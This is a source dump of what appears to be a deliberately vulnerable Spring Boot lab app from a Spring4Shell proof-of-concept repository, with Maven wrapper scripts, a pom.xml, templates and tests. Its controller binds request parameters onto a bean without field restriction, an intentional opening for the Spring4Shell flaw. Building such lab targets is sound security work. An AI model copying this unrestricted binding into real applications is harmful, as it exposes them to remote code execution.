http://www.apache.org/licenses/LICENSE-2.0 12 | # 13 | # Unless required by applicable law or agreed to in writing, 14 | # software distributed under the License is distributed on an 15 | # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY 16 | # KIND, either express or implied. See the License for the 17 | # specific language governing permissions and limitations 18 | # under the License. 
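# ----------------------------------------------------------------------------

# ----------------------------------------------------------------------------
# Maven2 Start Up Batch script
#
# Required ENV vars:
# ------------------
#   JAVA_HOME - location of a JDK home dir
#
# Optional ENV vars
# -----------------
#   M2_HOME - location of maven2's installed home dir
#   MAVEN_OPTS - parameters passed to the Java VM when running Maven
#     e.g. to debug Maven itself, use
#       set MAVEN_OPTS=-Xdebug -Xrunjdwp:transport=dt_socket,server=y,suspend=y,address=8000
#   MAVEN_SKIP_RC - flag to disable loading of mavenrc files
#   MAVEN_BASEDIR - overrides the detected project base directory
#   MAVEN_CONFIG - extra arguments placed before the user's arguments
#   MVNW_VERBOSE - set to 'true' to print what the wrapper bootstrap is doing
#   MVNW_REPOURL - repository base URL used to build the wrapper jar URL
#   MVNW_USERNAME / MVNW_PASSWORD - HTTP credentials for the wrapper jar download
# ----------------------------------------------------------------------------

# The rc files below are sourced into this shell, so whatever they contain runs
# with the privileges of the user invoking the wrapper. Set MAVEN_SKIP_RC to
# any non-empty value to skip them (for example in CI).
if [ -z "$MAVEN_SKIP_RC" ] ; then

  if [ -f /etc/mavenrc ] ; then
    . /etc/mavenrc
  fi

  if [ -f "$HOME/.mavenrc" ] ; then
    . "$HOME/.mavenrc"
  fi

fi

# OS specific support.  $var _must_ be set to either true or false.
cygwin=false;
darwin=false;
mingw=false
case "`uname`" in
  CYGWIN*) cygwin=true ;;
  MINGW*) mingw=true;;
  Darwin*) darwin=true
    # Use /usr/libexec/java_home if available, otherwise fall back to /Library/Java/Home
    # See https://developer.apple.com/library/mac/qa/qa1170/_index.html
    if [ -z "$JAVA_HOME" ]; then
      if [ -x "/usr/libexec/java_home" ]; then
        export JAVA_HOME="`/usr/libexec/java_home`"
      else
        export JAVA_HOME="/Library/Java/Home"
      fi
    fi
    ;;
esac

if [ -z "$JAVA_HOME" ] ; then
  if [ -r /etc/gentoo-release ] ; then
    JAVA_HOME=`java-config --jre-home`
  fi
fi

if [ -z "$M2_HOME" ] ; then
  ## resolve links - $0 may be a link to maven's home
  PRG="$0"

  # need this for relative symlinks
  while [ -h "$PRG" ] ; do
    ls=`ls -ld "$PRG"`
    link=`expr "$ls" : '.*-> \(.*\)$'`
    if expr "$link" : '/.*' > /dev/null; then
      PRG="$link"
    else
      PRG="`dirname "$PRG"`/$link"
    fi
  done

  saveddir=`pwd`

  M2_HOME=`dirname "$PRG"`/..

  # make it fully qualified
  M2_HOME=`cd "$M2_HOME" && pwd`

  cd "$saveddir"
  # echo Using m2 at $M2_HOME
fi

# For Cygwin, ensure paths are in UNIX format before anything is touched
if $cygwin ; then
  [ -n "$M2_HOME" ] &&
    M2_HOME=`cygpath --unix "$M2_HOME"`
  [ -n "$JAVA_HOME" ] &&
    JAVA_HOME=`cygpath --unix "$JAVA_HOME"`
  [ -n "$CLASSPATH" ] &&
    CLASSPATH=`cygpath --path --unix "$CLASSPATH"`
fi

# For Mingw, ensure paths are in UNIX format before anything is touched
if $mingw ; then
  [ -n "$M2_HOME" ] &&
    M2_HOME="`(cd "$M2_HOME"; pwd)`"
  [ -n "$JAVA_HOME" ] &&
    JAVA_HOME="`(cd "$JAVA_HOME"; pwd)`"
fi

# No JAVA_HOME given: derive it from the javac found on PATH.
if [ -z "$JAVA_HOME" ]; then
  javaExecutable="`which javac`"
  if [ -n "$javaExecutable" ] && ! [ "`expr \"$javaExecutable\" : '\([^ ]*\)'`" = "no" ]; then
    # readlink(1) is not available as standard on Solaris 10.
    readLink=`which readlink`
    if [ ! `expr "$readLink" : '\([^ ]*\)'` = "no" ]; then
      if $darwin ; then
        javaHome="`dirname \"$javaExecutable\"`"
        javaExecutable="`cd \"$javaHome\" && pwd -P`/javac"
      else
        javaExecutable="`readlink -f \"$javaExecutable\"`"
      fi
      javaHome="`dirname \"$javaExecutable\"`"
      javaHome=`expr "$javaHome" : '\(.*\)/bin'`
      JAVA_HOME="$javaHome"
      export JAVA_HOME
    fi
  fi
fi

if [ -z "$JAVACMD" ] ; then
  if [ -n "$JAVA_HOME" ] ; then
    if [ -x "$JAVA_HOME/jre/sh/java" ] ; then
      # IBM's JDK on AIX uses strange locations for the executables
      JAVACMD="$JAVA_HOME/jre/sh/java"
    else
      JAVACMD="$JAVA_HOME/bin/java"
    fi
  else
    JAVACMD="`which java`"
  fi
fi

if [ ! -x "$JAVACMD" ] ; then
  echo "Error: JAVA_HOME is not defined correctly." >&2
  echo " We cannot execute $JAVACMD" >&2
  exit 1
fi

if [ -z "$JAVA_HOME" ] ; then
  echo "Warning: JAVA_HOME environment variable is not set."
fi

CLASSWORLDS_LAUNCHER=org.codehaus.plexus.classworlds.launcher.Launcher

# traverses directory structure from process work directory to filesystem root
# first directory with .mvn subdirectory is considered project base directory
# $1 - directory to start from; prints the base directory on stdout and falls
#      back to $1 itself when no .mvn directory is found on the way up
find_maven_basedir() {

  if [ -z "$1" ]
  then
    echo "Path not specified to find_maven_basedir"
    return 1
  fi

  basedir="$1"
  wdir="$1"
  while [ "$wdir" != '/' ] ; do
    if [ -d "$wdir"/.mvn ] ; then
      basedir=$wdir
      break
    fi
    # workaround for JBEAP-8937 (on Solaris 10/Sparc)
    if [ -d "${wdir}" ]; then
      wdir=`cd "$wdir/.."; pwd`
    fi
    # end of workaround
  done
  echo "${basedir}"
}

# concatenates all lines of a file
# $1 - file to read; prints nothing when it is not a regular file
concat_lines() {
  if [ -f "$1" ]; then
    echo "$(tr -s '\n' ' ' < "$1")"
  fi
}

BASE_DIR=`find_maven_basedir "$(pwd)"`
if [ -z "$BASE_DIR" ]; then
  exit 1;
fi

##########################################################################################
# Extension to allow automatically downloading the maven-wrapper.jar from Maven-central
# This allows using the maven wrapper in projects that prohibit checking in binary data.
#
# Supply-chain note: the jar fetched here is put on the classpath and executed by
# the exec at the end of this script, and nothing in this script verifies its
# content. Keep wrapperUrl / MVNW_REPOURL pointed at a trusted HTTPS repository
# and compare the jar against a known-good checksum out of band.
##########################################################################################
if [ -r "$BASE_DIR/.mvn/wrapper/maven-wrapper.jar" ]; then
    if [ "$MVNW_VERBOSE" = true ]; then
      echo "Found .mvn/wrapper/maven-wrapper.jar"
    fi
else
    if [ "$MVNW_VERBOSE" = true ]; then
      echo "Couldn't find .mvn/wrapper/maven-wrapper.jar, downloading it ..."
    fi
    # Was `[ "$MVNW_REPOURL" = true]`: the missing space makes `[` fail with a
    # "missing ]" error, and the comparison against the word "true" could never
    # match a URL, so the override was silently ignored. Test for non-empty,
    # which is what mvnw.cmd checks as well.
    if [ -n "$MVNW_REPOURL" ]; then
      jarUrl="$MVNW_REPOURL/io/takari/maven-wrapper/0.5.2/maven-wrapper-0.5.2.jar"
    else
      jarUrl="https://repo.maven.apache.org/maven2/io/takari/maven-wrapper/0.5.2/maven-wrapper-0.5.2.jar"
    fi
    # A wrapperUrl entry in maven-wrapper.properties takes precedence over both
    # URLs above, so that file decides which jar ends up being executed.
    while IFS="=" read key value; do
      case "$key" in (wrapperUrl) jarUrl="$value"; break ;;
      esac
    done < "$BASE_DIR/.mvn/wrapper/maven-wrapper.properties"
    if [ "$MVNW_VERBOSE" = true ]; then
      echo "Downloading from: $jarUrl"
    fi
    wrapperJarPath="$BASE_DIR/.mvn/wrapper/maven-wrapper.jar"
    if $cygwin; then
      wrapperJarPath=`cygpath --path --windows "$wrapperJarPath"`
    fi

    # Credentials are quoted so that spaces or glob characters in them are not
    # word-split. They are still passed as command-line arguments, which other
    # local users can read from the process list while the download runs.
    # A failed download removes the partial file; otherwise the next run would
    # find a readable but truncated maven-wrapper.jar and skip the download.
    if command -v wget > /dev/null; then
        if [ "$MVNW_VERBOSE" = true ]; then
          echo "Found wget ... using wget"
        fi
        if [ -z "$MVNW_USERNAME" ] || [ -z "$MVNW_PASSWORD" ]; then
            wget "$jarUrl" -O "$wrapperJarPath" || rm -f "$wrapperJarPath"
        else
            wget --http-user="$MVNW_USERNAME" --http-password="$MVNW_PASSWORD" "$jarUrl" -O "$wrapperJarPath" || rm -f "$wrapperJarPath"
        fi
    elif command -v curl > /dev/null; then
        if [ "$MVNW_VERBOSE" = true ]; then
          echo "Found curl ... using curl"
        fi
        if [ -z "$MVNW_USERNAME" ] || [ -z "$MVNW_PASSWORD" ]; then
            curl -o "$wrapperJarPath" "$jarUrl" -f || rm -f "$wrapperJarPath"
        else
            curl --user "$MVNW_USERNAME:$MVNW_PASSWORD" -o "$wrapperJarPath" "$jarUrl" -f || rm -f "$wrapperJarPath"
        fi

    else
        if [ "$MVNW_VERBOSE" = true ]; then
          echo "Falling back to using Java to download"
        fi
        javaClass="$BASE_DIR/.mvn/wrapper/MavenWrapperDownloader.java"
        # For Cygwin, switch paths to Windows format before running javac
        if $cygwin; then
          javaClass=`cygpath --path --windows "$javaClass"`
        fi
        if [ -e "$javaClass" ]; then
            if [ ! -e "$BASE_DIR/.mvn/wrapper/MavenWrapperDownloader.class" ]; then
                if [ "$MVNW_VERBOSE" = true ]; then
                  echo " - Compiling MavenWrapperDownloader.java ..."
                fi
                # Compiling the Java class
                ("$JAVA_HOME/bin/javac" "$javaClass")
            fi
            if [ -e "$BASE_DIR/.mvn/wrapper/MavenWrapperDownloader.class" ]; then
                # Running the downloader
                if [ "$MVNW_VERBOSE" = true ]; then
                  echo " - Running MavenWrapperDownloader.java ..."
                fi
                # NOTE(review): MAVEN_PROJECTBASEDIR is only assigned further down, so
                # unless it is inherited from the environment the argument is empty
                # here - confirm what the downloader does with an empty base dir.
                ("$JAVA_HOME/bin/java" -cp .mvn/wrapper MavenWrapperDownloader "$MAVEN_PROJECTBASEDIR")
            fi
        fi
    fi
fi
##########################################################################################
# End of extension
##########################################################################################

export MAVEN_PROJECTBASEDIR=${MAVEN_BASEDIR:-"$BASE_DIR"}
if [ "$MVNW_VERBOSE" = true ]; then
  echo "$MAVEN_PROJECTBASEDIR"
fi
# JVM options from .mvn/jvm.config come first, the caller's MAVEN_OPTS after them
MAVEN_OPTS="$(concat_lines "$MAVEN_PROJECTBASEDIR/.mvn/jvm.config") $MAVEN_OPTS"

# For Cygwin, switch paths to Windows format before running java
if $cygwin; then
  [ -n "$M2_HOME" ] &&
    M2_HOME=`cygpath --path --windows "$M2_HOME"`
  [ -n "$JAVA_HOME" ] &&
    JAVA_HOME=`cygpath --path --windows "$JAVA_HOME"`
  [ -n "$CLASSPATH" ] &&
    CLASSPATH=`cygpath --path --windows "$CLASSPATH"`
  [ -n "$MAVEN_PROJECTBASEDIR" ] &&
    MAVEN_PROJECTBASEDIR=`cygpath --path --windows "$MAVEN_PROJECTBASEDIR"`
fi

WRAPPER_LAUNCHER=org.apache.maven.wrapper.MavenWrapperMain

# MAVEN_OPTS and MAVEN_CONFIG are left unquoted on purpose: each may hold
# several options that have to reach the JVM / the launcher as separate words.
exec "$JAVACMD" \
  $MAVEN_OPTS \
  -classpath "$MAVEN_PROJECTBASEDIR/.mvn/wrapper/maven-wrapper.jar" \
  "-Dmaven.home=${M2_HOME}" "-Dmaven.multiModuleProjectDirectory=${MAVEN_PROJECTBASEDIR}" \
  ${WRAPPER_LAUNCHER} $MAVEN_CONFIG "$@"

--------------------------------------------------------------------------------
/vulnerable-tomcat/spring-war/mvnw.cmd:
--------------------------------------------------------------------------------
1 | @REM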
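----------------------------------------------------------------------------
@REM Licensed to the Apache Software Foundation (ASF) under one
@REM or more contributor license agreements.  See the NOTICE file
@REM distributed with this work for additional information
@REM regarding copyright ownership.  The ASF licenses this file
@REM to you under the Apache License, Version 2.0 (the
@REM "License"); you may not use this file except in compliance
@REM with the License.  You may obtain a copy of the License at
@REM
@REM    http://www.apache.org/licenses/LICENSE-2.0
@REM
@REM Unless required by applicable law or agreed to in writing,
@REM software distributed under the License is distributed on an
@REM "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
@REM KIND, either express or implied.  See the License for the
@REM specific language governing permissions and limitations
@REM under the License.
@REM ----------------------------------------------------------------------------

@REM ----------------------------------------------------------------------------
@REM Maven2 Start Up Batch script
@REM
@REM Required ENV vars:
@REM JAVA_HOME - location of a JDK home dir
@REM
@REM Optional ENV vars
@REM M2_HOME - location of maven2's installed home dir
@REM MAVEN_BATCH_ECHO - set to 'on' to enable the echoing of the batch commands
@REM MAVEN_BATCH_PAUSE - set to 'on' to wait for a key stroke before ending
@REM MAVEN_OPTS - parameters passed to the Java VM when running Maven
@REM     e.g. to debug Maven itself, use
@REM set MAVEN_OPTS=-Xdebug -Xrunjdwp:transport=dt_socket,server=y,suspend=y,address=8000
@REM MAVEN_SKIP_RC - flag to disable loading of mavenrc files
@REM MAVEN_BASEDIR - overrides the detected project base directory
@REM MVNW_REPOURL - repository base URL used to build the wrapper jar URL
@REM MVNW_USERNAME / MVNW_PASSWORD - credentials for the wrapper jar download
@REM ----------------------------------------------------------------------------

@REM Begin all REM lines with '@' in case MAVEN_BATCH_ECHO is 'on'
@echo off
@REM set title of command window
title %0
@REM enable echoing by setting MAVEN_BATCH_ECHO to 'on'
@if "%MAVEN_BATCH_ECHO%" == "on"  echo %MAVEN_BATCH_ECHO%

@REM set %HOME% to equivalent of $HOME
if "%HOME%" == "" (set "HOME=%HOMEDRIVE%%HOMEPATH%")

@REM Execute a user defined script before this one
@REM These scripts run with the invoking user's privileges; set MAVEN_SKIP_RC
@REM to any non-empty value to skip them.
if not "%MAVEN_SKIP_RC%" == "" goto skipRcPre
@REM check for pre script, once with legacy .bat ending and once with .cmd ending
if exist "%HOME%\mavenrc_pre.bat" call "%HOME%\mavenrc_pre.bat"
if exist "%HOME%\mavenrc_pre.cmd" call "%HOME%\mavenrc_pre.cmd"
:skipRcPre

@setlocal

set ERROR_CODE=0

@REM To isolate internal variables from possible post scripts, we use another setlocal
@setlocal

@REM ==== START VALIDATION ====
if not "%JAVA_HOME%" == "" goto OkJHome

echo.
echo Error: JAVA_HOME not found in your environment. >&2
echo Please set the JAVA_HOME variable in your environment to match the >&2
echo location of your Java installation. >&2
echo.
goto error

:OkJHome
if exist "%JAVA_HOME%\bin\java.exe" goto init

echo.
echo Error: JAVA_HOME is set to an invalid directory. >&2
echo JAVA_HOME = "%JAVA_HOME%" >&2
echo Please set the JAVA_HOME variable in your environment to match the >&2
echo location of your Java installation. >&2
echo.
goto error

@REM ==== END VALIDATION ====

:init

@REM Find the project base dir, i.e. the directory that contains the folder ".mvn".
@REM Fallback to current working directory if not found.

set MAVEN_PROJECTBASEDIR=%MAVEN_BASEDIR%
IF NOT "%MAVEN_PROJECTBASEDIR%"=="" goto endDetectBaseDir

set EXEC_DIR=%CD%
set WDIR=%EXEC_DIR%
:findBaseDir
IF EXIST "%WDIR%"\.mvn goto baseDirFound
cd ..
IF "%WDIR%"=="%CD%" goto baseDirNotFound
set WDIR=%CD%
goto findBaseDir

:baseDirFound
set MAVEN_PROJECTBASEDIR=%WDIR%
cd "%EXEC_DIR%"
goto endDetectBaseDir

:baseDirNotFound
set MAVEN_PROJECTBASEDIR=%EXEC_DIR%
cd "%EXEC_DIR%"

:endDetectBaseDir

IF NOT EXIST "%MAVEN_PROJECTBASEDIR%\.mvn\jvm.config" goto endReadAdditionalConfig

@REM Join all lines of jvm.config into one option string
@setlocal EnableExtensions EnableDelayedExpansion
for /F "usebackq delims=" %%a in ("%MAVEN_PROJECTBASEDIR%\.mvn\jvm.config") do set JVM_CONFIG_MAVEN_PROPS=!JVM_CONFIG_MAVEN_PROPS! %%a
@endlocal & set JVM_CONFIG_MAVEN_PROPS=%JVM_CONFIG_MAVEN_PROPS%

:endReadAdditionalConfig

SET MAVEN_JAVA_EXE="%JAVA_HOME%\bin\java.exe"
set WRAPPER_JAR="%MAVEN_PROJECTBASEDIR%\.mvn\wrapper\maven-wrapper.jar"
set WRAPPER_LAUNCHER=org.apache.maven.wrapper.MavenWrapperMain

set DOWNLOAD_URL="https://repo.maven.apache.org/maven2/io/takari/maven-wrapper/0.5.2/maven-wrapper-0.5.2.jar"

@REM usebackq is required here: without it FOR /F treats a double-quoted set as
@REM a literal string rather than a file name, so the properties file was never
@REM read and a wrapperUrl pinned by the project was ignored.
FOR /F "usebackq tokens=1,2 delims==" %%A IN ("%MAVEN_PROJECTBASEDIR%\.mvn\wrapper\maven-wrapper.properties") DO (
    IF "%%A"=="wrapperUrl" SET DOWNLOAD_URL=%%B
)

@REM Apply MVNW_REPOURL before the download block. %DOWNLOAD_URL% inside a
@REM parenthesised block is expanded when the block is parsed, so a SET placed
@REM inside the block below would not reach the download command.
@REM NOTE(review): here MVNW_REPOURL wins over wrapperUrl, whereas the mvnw shell
@REM script lets wrapperUrl win - confirm which precedence is intended.
if not "%MVNW_REPOURL%" == "" (
    SET DOWNLOAD_URL="%MVNW_REPOURL%/io/takari/maven-wrapper/0.5.2/maven-wrapper-0.5.2.jar"
)

@REM Extension to allow automatically downloading the maven-wrapper.jar from Maven-central
@REM This allows using the maven wrapper in projects that prohibit checking in binary data.
@REM Supply-chain note: the downloaded jar is executed right below and is not
@REM verified by this script; keep the URL on a trusted HTTPS repository and
@REM compare the jar against a known-good checksum out of band.
@REM MVNW_USERNAME, MVNW_PASSWORD and the URL are pasted into the PowerShell
@REM command text, so they must come from a trusted source and must not contain
@REM quote characters.
if exist %WRAPPER_JAR% (
    echo Found %WRAPPER_JAR%
) else (
    echo Couldn't find %WRAPPER_JAR%, downloading it ...
    echo Downloading from: %DOWNLOAD_URL%

    powershell -Command "&{"^
        "$webclient = new-object System.Net.WebClient;"^
        "if (-not ([string]::IsNullOrEmpty('%MVNW_USERNAME%') -and [string]::IsNullOrEmpty('%MVNW_PASSWORD%'))) {"^
        "$webclient.Credentials = new-object System.Net.NetworkCredential('%MVNW_USERNAME%', '%MVNW_PASSWORD%');"^
        "}"^
        "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $webclient.DownloadFile('%DOWNLOAD_URL%', '%WRAPPER_JAR%')"^
        "}"
    echo Finished downloading %WRAPPER_JAR%
)
@REM End of extension

%MAVEN_JAVA_EXE% %JVM_CONFIG_MAVEN_PROPS% %MAVEN_OPTS% %MAVEN_DEBUG_OPTS% -classpath %WRAPPER_JAR% "-Dmaven.multiModuleProjectDirectory=%MAVEN_PROJECTBASEDIR%" %WRAPPER_LAUNCHER% %MAVEN_CONFIG% %*
if ERRORLEVEL 1 goto error
goto end

:error
set ERROR_CODE=1

:end
@endlocal & set ERROR_CODE=%ERROR_CODE%

if not "%MAVEN_SKIP_RC%" == "" goto skipRcPost
@REM check for post script, once with legacy .bat ending and once with .cmd ending
if exist "%HOME%\mavenrc_post.bat" call "%HOME%\mavenrc_post.bat"
if exist "%HOME%\mavenrc_post.cmd" call "%HOME%\mavenrc_post.cmd"
:skipRcPost

@REM pause the script if MAVEN_BATCH_PAUSE is set to 'on'
if "%MAVEN_BATCH_PAUSE%" == "on" pause

if "%MAVEN_TERMINATE_CMD%" == "on" exit %ERROR_CODE%

exit /B %ERROR_CODE%

--------------------------------------------------------------------------------
/vulnerable-tomcat/spring-war/pom.xml:
--------------------------------------------------------------------------------
1 | 2 | 4 |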
4.0.0 5 | 6 | org.springframework.boot 7 | spring-boot-starter-parent 8 | 2.6.3 9 | 10 | 11 | com.example 12 | spring-form 13 | 0.0.1-SNAPSHOT 14 | spring-form 15 | Demo project for Spring Boot 16 | war 17 | 18 | 1.8 19 | 20 | 21 | 22 | org.springframework.boot 23 | spring-boot-starter-thymeleaf 24 | 25 | 26 | org.springframework.boot 27 | spring-boot-starter-web 28 | 29 | 30 | 31 | org.springframework.boot 32 | spring-boot-starter-test 33 | test 34 | 35 | 36 | org.springframework.boot 37 | spring-boot-starter-tomcat 38 | provided 39 | 40 | 41 | 42 | 43 | ${artifactId} 44 | 45 | 46 | org.springframework.boot 47 | spring-boot-maven-plugin 48 | 49 | 50 | 51 | 52 | 53 |
--------------------------------------------------------------------------------
/vulnerable-tomcat/spring-war/settings.gradle:
--------------------------------------------------------------------------------
1 | rootProject.name = 'spring-form' 2 |
--------------------------------------------------------------------------------
/vulnerable-tomcat/spring-war/src/main/java/com/example/handlingformsubmission/Greeting.java:
--------------------------------------------------------------------------------
package com.example.handlingformsubmission;

/**
 * Form-backing bean for the greeting form.
 *
 * <p>GreetingController binds request parameters onto an instance of this
 * class through {@code @ModelAttribute}, so every public setter declared here
 * can be driven by a request parameter of the same name.
 */
public class Greeting {

	/** Numeric identifier submitted with the form; 0 until set. */
	private long id;

	/** Free-text message submitted with the form; null until set. */
	private String content;

	/** @return the identifier last stored by {@link #setId(long)} */
	public long getId() {
		return this.id;
	}

	/** @param id identifier to store */
	public void setId(final long id) {
		this.id = id;
	}

	/** @return the message last stored by {@link #setContent(String)} */
	public String getContent() {
		return this.content;
	}

	/** @param content message to store; stored as given, without validation */
	public void setContent(final String content) {
		this.content = content;
	}

}

--------------------------------------------------------------------------------
/vulnerable-tomcat/spring-war/src/main/java/com/example/handlingformsubmission/GreetingController.java:
--------------------------------------------------------------------------------
1 | package com.example.handlingformsubmission; 2 | 3 | import org.springframework.stereotype.Controller; 4 | import
org.springframework.ui.Model;
import org.springframework.web.bind.annotation.GetMapping;
import org.springframework.web.bind.annotation.ModelAttribute;
import org.springframework.web.bind.annotation.PostMapping;

/**
 * Serves the greeting form and renders the submitted values.
 *
 * <p>Security note: {@link #greetingSubmit} binds request parameters onto a
 * {@link Greeting} with {@code @ModelAttribute}. Request-parameter binding onto
 * a plain bean is the entry point this deliberately vulnerable lab application
 * exposes (the repository names the issue Spring4Shell). Outside a lab, keep
 * the framework on a patched release and limit what the binder may set, for
 * example with an {@code @InitBinder} method that calls
 * {@code WebDataBinder#setAllowedFields} for the expected form fields.
 */
@Controller
public class GreetingController {

	/** Name of the template that shows the empty form. */
	private static final String FORM_VIEW = "greeting";

	/** Name of the template that shows the submitted values. */
	private static final String RESULT_VIEW = "result";

	/**
	 * Handles GET /greeting.
	 *
	 * @param model receives a fresh {@link Greeting} under the key "greeting"
	 * @return the form view name
	 */
	@GetMapping("/greeting")
	public String greetingForm(Model model) {
		final Greeting blank = new Greeting();
		model.addAttribute("greeting", blank);
		return FORM_VIEW;
	}

	/**
	 * Handles POST /greeting.
	 *
	 * @param greeting bean populated by Spring's data binder from the request
	 *                 parameters; no field restriction or validation is applied
	 * @param model    receives the bound bean under the key "greeting"
	 * @return the result view name
	 */
	@PostMapping("/greeting")
	public String greetingSubmit(@ModelAttribute Greeting greeting, Model model) {
		model.addAttribute("greeting", greeting);
		return RESULT_VIEW;
	}

}

--------------------------------------------------------------------------------
/vulnerable-tomcat/spring-war/src/main/java/com/example/handlingformsubmission/HandlingFormSubmissionApplication.java:
--------------------------------------------------------------------------------
package com.example.handlingformsubmission;

import org.springframework.boot.SpringApplication;
import org.springframework.boot.autoconfigure.SpringBootApplication;
import org.springframework.boot.web.servlet.support.SpringBootServletInitializer;

/**
 * Application entry point. Extending {@link SpringBootServletInitializer}
 * lets the same class be started from a WAR deployed to a servlet container
 * as well as from {@link #main}.
 */
@SpringBootApplication
public class HandlingFormSubmissionApplication extends SpringBootServletInitializer {

	/**
	 * Starts the application when it is run directly.
	 *
	 * @param args command-line arguments, handed to Spring Boot unchanged
	 */
	public static void main(String[] args) {
		SpringApplication.run(HandlingFormSubmissionApplication.class, args);
	}

}

--------------------------------------------------------------------------------
/vulnerable-tomcat/spring-war/src/main/resources/templates/greeting.html:
--------------------------------------------------------------------------------
1 | 2 | 3 | 4 | Getting Started: Handling Form Submission 5 | 6 | 7 | 8 |

Form

9 |
10 |

Id:

11 |

Message:

12 |

13 |
14 | 15 | 16 | -------------------------------------------------------------------------------- /vulnerable-tomcat/spring-war/src/main/resources/templates/result.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Getting Started: Handling Form Submission 5 | 6 | 7 | 8 |

Result

9 |

10 |

11 | Submit another message 12 | 13 | 14 |
--------------------------------------------------------------------------------
/vulnerable-tomcat/spring-war/src/test/java/com/example/handlingformsubmission/HandlingFormSubmissionApplicationTest.java:
--------------------------------------------------------------------------------
/*
 * Copyright 2012-2018 the original author or authors.
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *      https://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */

package com.example.handlingformsubmission;

import static org.hamcrest.Matchers.containsString;
import static org.springframework.test.web.servlet.request.MockMvcRequestBuilders.get;
import static org.springframework.test.web.servlet.request.MockMvcRequestBuilders.post;
import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.content;

import org.junit.jupiter.api.Test;

import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.boot.test.autoconfigure.web.servlet.WebMvcTest;
import org.springframework.test.context.TestPropertySource;
import org.springframework.test.web.servlet.MockMvc;

/**
 * MVC slice tests for {@link GreetingController}.
 *
 * <p>Both tests exercise only the two declared form fields ({@code id} and
 * {@code content}). Nothing here pins how the binder treats parameter names
 * that are not fields of {@link Greeting}, so these tests say nothing about
 * the data-binding exposure the lab application is built to show.
 */
@WebMvcTest(GreetingController.class)
@TestPropertySource(properties = "logging.level.org.springframework.web=DEBUG")
public class HandlingFormSubmissionApplicationTest {

	/** Path served by both handlers under test. */
	private static final String GREETING_PATH = "/greeting";

	@Autowired
	private MockMvc mockMvc;

	/** GET on the form path returns a page containing the text "Form". */
	@Test
	public void rendersForm() throws Exception {
		mockMvc.perform(get(GREETING_PATH))
				.andExpect(content().string(containsString("Form")));
	}

	/** POST with id and content returns the result page echoing the id. */
	@Test
	public void submitsForm() throws Exception {
		mockMvc.perform(
						post(GREETING_PATH)
								.param("id", "12345")
								.param("content", "Hello"))
				.andExpect(content().string(containsString("Result")))
				.andExpect(content().string(containsString("id: 12345")));
	}

}

--------------------------------------------------------------------------------
/vulnerable-tomcat/spring4shellapplication.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BobTheShoplifter/Spring4Shell-POC/f856cf519af5c75c7cac670dcc1769f282803047/vulnerable-tomcat/spring4shellapplication.png
--------------------------------------------------------------------------------